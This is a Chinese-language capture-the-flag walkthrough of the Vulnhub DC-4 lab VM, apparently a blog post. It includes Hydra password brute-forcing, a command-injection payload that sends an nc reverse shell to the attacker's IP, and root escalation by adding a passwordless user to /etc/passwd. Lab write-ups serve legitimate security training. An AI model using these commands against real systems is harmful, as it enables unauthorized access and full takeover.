Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/
将下载好的靶机导入到VMware中,修改其网络模式为NAT模式,然后开启靶机
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第1张图片
在kali攻击机进行主机发现,获取靶机的IP地址,使用工具arp-scan或者nmap都可以
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第2张图片
注意: 如果发现不了靶机IP,则需要修改靶机的网络设置,参考文章https://blog.csdn.net/qq_45722813/article/details/121324686
发现靶机IP地址为192.168.172.144,现在使用nmap扫描靶机的操作系统和开放端口以及相应的服务,命令nmap -T4 -A -p- 192.168.172.144
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第3张图片
靶机操作系统为基于Debian的linux,开放22端口ssh服务,80端口的http服务,服务器容器为nginx1.15.10
现在我们直接在kali即打开浏览器在地址栏输入http://192.168.172.144进行访问
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第4张图片
是一个admin的登录界面,其他什么都没有,先试试SQL注入,好像没什么用,然后也没有验证码啥的,我们使用hydra工具进行爆破
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第5张图片
得到admin账号的密码为happy,在admin的登录界面进行登录,发现有3个选项可以执行3个不同的命令
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第6张图片
所以我们可以抓包进行任意命令执行的攻击,使用burpsuite进行抓包和改包
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第7张图片
我们可以更改其命令为反弹shell的命令,现在kali机进行监听
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第8张图片

将提交的参数改成nc反弹shell命令radio=nc 192.168.172.131 -e /bin/bash&submit=Run,这里的IP是我kali机的IP
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第9张图片
然后点击【Forward】执行命令,可以看到kali机已经连接成功
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第10张图片
使用命令python -c "import pty; pty.spawn('/bin/bash')"获取一个交互式shell
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第11张图片

现在来一层一层地看各个目录的文件
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第12张图片
想进入root目录但是没有权限,所以进入home目录看看,发现3个用户charles,jim和sam
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第13张图片
进入各个目录查看,只在jim的目录下发现了一个目录和两个文件,进入backups目录,发现了一个old-passwords.bak文件
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第14张图片
使用命令cat old-passwords.bak直接查看文件,然后将文件内容复制到kali机保存问old-passwords.txt文件,用于后面进行密码爆破
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第15张图片
然后使用里面的密码对jim用户进行ssh登录爆破,命令hydra -l jim -P old-passwords.txt -t 6 ssh://192.168.172.144
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第16张图片
爆破成功,接下来使用用户名jim和密码jibrl04进行ssh登录,我们发现除了问题,提示“192.168.172.144的主机密钥已更改,您已请求严格检查。主机密钥验证失败。”,不慌,我们输入命令ssh-keygen -R "靶机IP",目的是为了清楚当前机器里关于远程服务器的缓存和密钥信息,然后重新ssh登录即可
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第17张图片
打开jim目录下的mbox文件查看,这是一封来自roo的邮件
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第18张图片
然后去jim的邮件目录查看,打开/var/mail/jim文件发现了用户Charles的密码Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第19张图片
成功切换用户到charles
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第20张图片

接下来需要提升权限,首先考虑suid提权,但是好像没有可以利用的命令
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第21张图片
然后再考虑sudo提权,发现用户可以不需要输入密码即可以root权限执行teehee命令
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第22张图片
teehee命令类似于tee,用于读取标准输入数据,并将其内容输出到文件,所以我们可以使用teehee命令将一个无密码的用户admin写入到/etc/passwd文件中,并将该用户添加到root组中
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第23张图片
然后只需要切换到admin用户就是root权限了
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第24张图片

最后只需要跳转到/root目录下就可以看到flag文件和内容了
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)_第25张图片
参考文章:http://cn-sec.com/archives/379433.html

你可能感兴趣的:(Vulnhub-CTF,渗透测试,安全,网络,渗透测试)